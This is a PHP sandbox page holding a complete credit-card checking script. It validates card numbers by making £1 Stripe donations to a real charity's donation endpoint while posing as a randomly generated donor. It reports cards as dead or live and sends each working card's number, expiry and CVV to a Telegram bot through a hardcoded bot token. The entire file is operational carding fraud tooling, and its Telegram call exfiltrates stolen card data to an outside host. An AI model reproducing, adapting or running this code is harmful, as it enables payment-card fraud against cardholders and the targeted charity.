12th - PHP Online
Form of PHP Sandbox
*** This page was generated with the meta tag "noindex, nofollow". This happened because you selected this option before saving or the system detected it as spam. This means that this page will never get into the search engines and the search bot will not crawl it. There is nothing to worry about, you can still share it with anyone.
Enter Your PHP code here for testing/debugging in the Online PHP Sandbox. As in the usual PHP files, you can also add HTML, but do not forget to add the tag <?php in the places where the PHP script should be executed.
Result of php executing
Full code of 12th.php
- <?php
- ob_start();
- error_reporting(0);
- $timeZone = $_GET['timezone'];
- date_default_timezone_set($timeZone);
- /*======| Functions & Variables |======*/
- function getStr($string, $start, $end)
- {
- $string = " " . $string;
- $ini = strpos($string, $start);
- if ($ini == 0)
- return "";
- $ini += strlen($start);
- $len = strpos($string, $end, $ini) - $ini;
- return substr($string, $ini, $len);
- }
- function multi_explode($delimiters, $string)
- {
- $delimiter_replace = str_replace($delimiters, $delimiters[0], $string);
- $explode_result = explode($delimiters[0], $delimiter_replace);
- return $explode_result;
- }
- $cards = $_GET['cards'];
- $tgu = $_GET["tguser"];
- $tgt = $_GET["tgtoken"];
- if ($tgt == "empty") {
- $tgtoken = '6668744914:AAH5QvoJd6P1OWIZepkP70P-Msr0FHUd7bo';
- } else {
- $tgtoken = $tgt;
- }
- $exploded = multi_explode(array(":", "|", "", "/", " ", "-"), $cards);
- $cc = $exploded[0];
- $mo = $exploded[1];
- $yr = $exploded[2];
- $cvv = $exploded[3];
- $bin = substr($cc, 0, 6);
- $clearCC = "$cc|$mo|$yr|$cvv";
- if (strlen($mo) == 1) $mo = "0$mo";
- if (strlen($yr) == 2) $yr = "20$yr";
- function sendMessage($botToken, $tgu, $txt) {
- $url = "https://api.telegram.org/bot{$botToken}/sendMessage";
- $postData = [
- 'chat_id' => $tgu,
- 'text' => $txt,
- 'parse_mode' => 'HTML'
- ];
- $ch = curl_init($url);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData));
- $res = curl_exec($ch);
- curl_close($ch);
- return $res;
- }
- function time1($val){
- $endtime = microtime(true);
- $time = $endtime - $val;
- $time = substr($time, 0, 4);
- return $time;
- }
- $mytime = 'time1';
- $starttime = microtime(true);
- $took = $mytime($starttime);
- $time = $took . 's';
- /*======| BIN LOOKUP |======*/
- $binchk = curl_init();
- curl_setopt($binchk, CURLOPT_URL, 'https://lookup.binlist.net/' . $cc . '');
- curl_setopt($binchk, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
- curl_setopt(
- $binchk,
- CURLOPT_HTTPHEADER,
- array(
- 'Host: lookup.binlist.net',
- 'Cookie: _ga=GA1.2.549903363.1545240628; _gid=GA1.2.82939664.1545240628',
- 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'
- )
- );
- curl_setopt($binchk, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($binchk, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($binchk, CURLOPT_POSTFIELDS, '');
- $binData1 = curl_exec($binchk);
- $binjson = json_decode($binData1, true);
- $emoji = $binjson["country"]["emoji"];
- $scheme = $binjson["scheme"];
- $brand = $binjson['brand'];
- $bank = $binjson['bank']['name'];
- if (strpos($binData1, '"type":"credit"') !== false) {
- $type = 'credit';
- } else {
- $type = 'debit';
- }
- curl_close($binchk);
- /*======| RANDOMIZING DETAILS |======*/
- $headersbin = array(
- "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36",
- "Pragma: no-cache",
- "Accept: */*"
- );
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "https://randomuser.me/api?nat=us");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_HTTPHEADER, $headersbin);
- $rand = curl_exec($ch);
- $randj = json_decode($rand, true);
- $firstname = $randj["results"][0]["name"]["first"];
- $lastname = $randj['results'][0]['name']['last'];
- $phone = $randj['results'][0]['phone'];
- $zip = $randj['results'][0]['location']['postcode'];
- $state = $randj['results'][0]['location']['state'];
- $email = $randj['results'][0]['email'];
- $city = $randj['results'][0]['location']['city'];
- $street = $randj['results'][0]['location']['street'];
- $serve_arr = array("gmail.com", "outlook.com");
- $serv_rnd = $serve_arr[array_rand($serve_arr)];
- $gmail = str_replace("example.com", $serv_rnd, $email);
- $dataset = json_decode(file_get_contents('./sk.json'), true);
- $bans = $dataset["blocked_bins"];
- /*======| START |======*/
- if (in_array($bin, $bans)) {
- echo "<span>❌ BIN BANNED !</span><br><span>➤ CC : $clearCC</span><br><span class='uppercase'>➤ BIN : $scheme | $type | $brand</span><br>";
- } else {
- $headers = array(
- "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
- "accept-encoding: gzip, deflate, br",
- "accept-language: en-US,en;q=0.9",
- "cache-control: max-age=0",
- "sec-ch-ua: \"Google Chrome\";v=\"111\", \"Not(A:Brand\";v=\"8\", \"Chromium\";v=\"111\"",
- "sec-ch-ua-mobile: ?0",
- "sec-ch-ua-platform: \"Windows\"",
- "sec-fetch-dest: document",
- "sec-fetch-mode: navigate",
- "sec-fetch-site: cross-site",
- "sec-fetch-user: ?1",
- "upgrade-insecure-requests: 1",
- "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36"
- );
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "https://12th-man.org.uk/donate");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
- $response = curl_exec($ch);
- $num = rand(55, 455);
- $guid = uniqid();
- $sid = uniqid();
- $muid = uniqid();
- $deftime = "1";
- $payload = array(
- "action" => "donations-stripe-setup",
- "data" => array(
- "step" => 1,
- "select" => 10,
- "amount" => "1",
- "trade" => "12th Man",
- "firstname" => $firstname,
- "lastname" => $lastname,
- "email" => "gpu-don" . $num . "@gmail.com",
- "method" => "card",
- "message" => "",
- "gdpr" => false,
- "token" => "435fglspdmgrw3445gfdg455hg"
- )
- );
- $id_headers = array(
- "accept: */*",
- "accept-language: en-GB,en-US;q=0.9,en;q=0.8",
- "cache-control: no-cache",
- "content-type: application/json",
- "pragma: no-cache",
- "sec-ch-ua: \"Not:A-Brand\";v=\"99\", \"Chromium\";v=\"112\"",
- "sec-ch-ua-mobile: ?1",
- "sec-ch-ua-platform: \"Android\"",
- "sec-fetch-dest: empty",
- "sec-fetch-mode: cors",
- "sec-fetch-site: same-origin",
- "cookie: _ga=GA1.3.1966450108.1691328405; _gid=GA1.3.1554455488.1691328405; __stripe_mid=7e8f1b8a-71a4-4731-9a3a-1c7ad1cb98c4759f6c; __stripe_sid=ab127afb-3e65-4f3f-8f62-f1215b2c160609ae50; _gat=1; _ga_EELZ47YXCB=GS1.3.1691328408.1.1.1691330625.0.0.0"
- );
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "https://12th-man.org.uk/api");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));
- curl_setopt($ch, CURLOPT_HTTPHEADER, $id_headers);
- $response = curl_exec($ch);
- $data = json_decode($response, true);
- $id = $data["data"]["intent_id"];
- $cli = $data["data"]["client_id"];
- $pk = $data["data"]["pub_key"];
- $payload = array(
- "source_data[type]" => "card",
- "source_data[card][number]" => $cc,
- "source_data[card][cvc]" => $cvv,
- "source_data[card][exp_month]" => $mo,
- "source_data[card][exp_year]" => $yr,
- "source_data[owner][address][postal_code]" => $zip,
- "source_data[guid]" => $guid,
- "source_data[muid]" => $muid,
- "source_data[sid]" => $sid,
- "source_data[pasted_fields]" => "number",
- "source_data[payment_user_agent]" => "stripe.js/a5288ed6e1; stripe-js-v3/a5288ed6e1",
- "source_data[time_on_page]" => "79678",
- "expected_payment_method_type" => "card",
- "use_stripe_sdk" => "true",
- "key" => $pk,
- "client_secret" => $cli
- );
- $pay_headers = array(
- ":scheme: https",
- "accept: application/json",
- "accept-encoding: gzip, deflate, br",
- "accept-language: en-US,en;q=0.9",
- "origin: https://js.stripe.com",
- "referer: https://js.stripe.com/",
- "sec-ch-ua: \"Google Chrome\";v=\"111\", \"Not(A:Brand\";v=\"8\", \"Chromium\";v=\"111\"",
- "sec-ch-ua-mobile: ?0",
- "sec-ch-ua-platform: \"Windows\"",
- "sec-fetch-dest: empty",
- "sec-fetch-mode: cors",
- "sec-fetch-site: same-site",
- "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36"
- );
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "https://api.stripe.com/v1/payment_intents/$id/confirm");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
- // curl_setopt($ch, CURLOPT_HTTPHEADER, $pay_headers);
- $response = curl_exec($ch);
- $result = json_decode($response, true);
- if (isset($result['error'])) {
- echo '<span>┏ ❌ DEAD CC !</span><br><span class="uppercase">┠ RESPONSE : '.$result['error']['code'].' - '.$result['error']['decline_code'].'</span><br><span class="uppercase">┠ MSG : '.$result['error']['message'].'</span><br><span>┗ CC : ' . $clearCC . '</span><br>';
- } elseif (isset($result['status']) && $result['status'] === 'succeeded') {
- echo '┏<span class="text-[#ff822d]"> ⚡ DONATION SUCCESS !</span><br><span class="uppercase">┠ RESPONSE : £1 - THANK YOU !</span><br><span>┠ CC : <span class="select-all">' . $clearCC . '</span></span><br><span class="uppercase">┗ BIN : ' . $scheme . ' | ' . $type . ' | ' . $brand . '</span><br>';
- sendMessage($tgtoken, $tgu, "⚡ ???????????????? ???????????????????????????????????? !\n➥ ???????? : <code>$clearCC</code>\n➥ ???????????? : <code>£1 successed</code>\n➥ ???????????????? : $time");
- } else {
- echo '<span>┏ ❌ DEAD CC !</span><br><span>┠ RESPONSE : <code>'.$response.'</code></span><br><span>┗ CC : ' . $clearCC . '</span><br>';
- }
- curl_close($ch);
- }
- ob_flush();
- ?>